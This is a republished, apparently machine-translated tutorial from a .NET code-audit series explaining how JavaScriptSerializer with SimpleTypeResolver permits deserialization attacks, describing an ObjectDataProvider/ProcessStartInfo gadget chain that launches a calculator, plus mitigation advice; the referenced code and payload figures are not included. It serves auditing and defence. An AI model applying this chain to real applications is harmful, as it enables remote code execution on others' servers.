Shulou(Shulou.com)05/31 Report--

What is the JavaScript Serializer deserialization vulnerability? I believe many inexperienced people don't know what to do about it. Therefore, this article summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

I. Preface

When .NET deals with Ajax applications, the serialization function is usually provided by the JavaScriptSerializer class, which is the class of the serialization function implemented internally after .NET 2.0, which is located in the namespace System.Web.Script.Serialization and referenced by System.Web.Extensions, allowing developers to easily implement the conversion between all types and Json data in .net However, in some scenarios, when developers use Deserialize or DeserializeObject methods to process insecure Json data, it will cause deserialization attacks and implement remote RCE vulnerabilities. The author introduces and repeats it from the perspective of principle and code audit.

The previous review:

XmlSerializer deserialization vulnerability of .NET Advanced Code Audit

.net Advanced Code Audit (lesson 2) Json.Net deserialization vulnerability

.net Advanced Code Audit (lesson 3) Fastjson deserialization vulnerability

II. JavaScriptSerializer serialization

Let's take a look at a classic piece of code from this series of courses:

The TestClass class defines three members and implements a static method ClassMethod to start the process. Serialization assigns values to members by creating object instances

It is very convenient to use the Serialize method in the JavaScriptSerializer class to realize the conversion between .NET objects and Json data. The author defines the TestClass object and normally uses Serialize to get the serialized Json.

From the previous introduction to the principle of deserialization vulnerabilities of other components, we know that the Key value of _ _ type is required. To get this Value, you must get the full identity of the assembly (including assembly name, version, language, culture, and public key). In JavaScriptSerializer, you can instantiate the SimpleTypeResolver class to provide a type parser for managed types, and customize the metadata assembly qualified name of the type in the serialization string. The author rewrites the code to add a type parser

The full identity of the output assembly for this serialization is as follows

Third, JavaScriptSerializer deserialization 3.1 deserialization usage

The deserialization process is achieved by converting Json data into objects, creating objects in the JavaScriptSerializer class, and then calling the DeserializeObject or Deserialize methods.

The DeserializeInternal method is called inside the BasicDeserialize to determine whether the dictionary collection contains the Key of the ServerTypeFieldName constant when it needs to be converted to an object.

The value of the ServerTypeFieldName constant defined in the JavaScriptSerializer class is "_ _ type"

Peel the cocoon and draw the silk, ignore the non-core method blocks ConvertObjectToType, ConvertObjectToTypeMain, ConvertObjectToTypeInternal, and finally locate it in the ConvertDictionaryToObject method.

The code first determines the existence of the ServerTypeFieldName value, then outputs the assignment to the object s, the second step casts the object s into the string variable serverTypeName, the third part obtains the actual type in the parser, and constructs an instance of the type through the CreateInstance of System.Activator

The Activator class provides several overloaded versions of the static CreateInstance method, which can pass either a Type object reference or a String that identifies the type when the method is called, and the method returns a reference to the new object. The following figure Demo shows the effect before and after serialization and deserialization:

Get the properties of the object after deserialization, and print out the value of the current member Name

3.2 build Poc

By default, JavaScriptSerializer does not use a type parser, so it is a secure serialization processing class. The trigger point of the vulnerability also lies in whether the SimpleTypeResolver class is created when the instance of the JavaScriptSerializer class is initialized. If so, and the deserialized Json data can trigger the deserialization vulnerability under controllable circumstances, use the figure to illustrate the call chain process.

The author still chooses the ObjectDataProvider class to facilitate calling methods in any referenced class. For more information on the use of this class, please see ".NET Advanced Code Audit (lesson 1) XmlSerializer deserialization vulnerability". Because the Process.Start method starts a thread, you need to configure the properties related to the ProcessStartInfo class, such as specifying the file name and specifying startup parameters, so you have to consider serializing ProcessStartInfo first. This piece can refer to ".NET Advanced Code Audit (lesson 3) Fastjson deserialization vulnerability", then subtract the generated data, remove irrelevant System.RuntimeType and System.IntPtr data, and finally get deserialized Poc

The author wrote the trigger code and used Deserialize to deserialize Json and successfully pop up the calculator.

4. Code audit perspective 4.1 Deserialize

From the point of view of code audit, it is easy to find the contamination point of the vulnerability. Through the knowledge in the previous sections, we can find that a key condition new SimpleTypeResolver () needs to be met, and then input Json data, which can be deserialized, such as the following JsonHelper class

An attacker only needs to control the incoming string parameter input to easily implement deserialization vulnerabilities. There are also a large number of unsafe case codes on Github.

4.2 DeserializeObject

JavaScriptSerializer also has a deserialization method, DeserializeObject, which can also trigger vulnerabilities. The specific contamination code is as follows

V. case review

Finally, the following example is used to review the whole process, which shows that the calculator is popped up through deserialization vulnerabilities in VS debugging.

1. Enter http://localhost:5651/Default Post to load the value value

two。 Deserialize via DeserializeObject and pop up the calculator

Finally, a dynamic diagram is attached:

VI. Summary

With the advantages provided by Microsoft, JavaScriptSerializer has a relatively high utilization rate in actual development. As long as you do not use a type parser or configure the type parser to be a valid type in the whitelist, you can prevent deserialization attacks (the default is a secure serializer). For attackers, the probability of utilization in actual scenarios is not high, after all, many developers will not use SimpleTypeResolver classes to process data.

After reading the above, have you mastered the method of JavaScript Serializer deserialization vulnerability? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.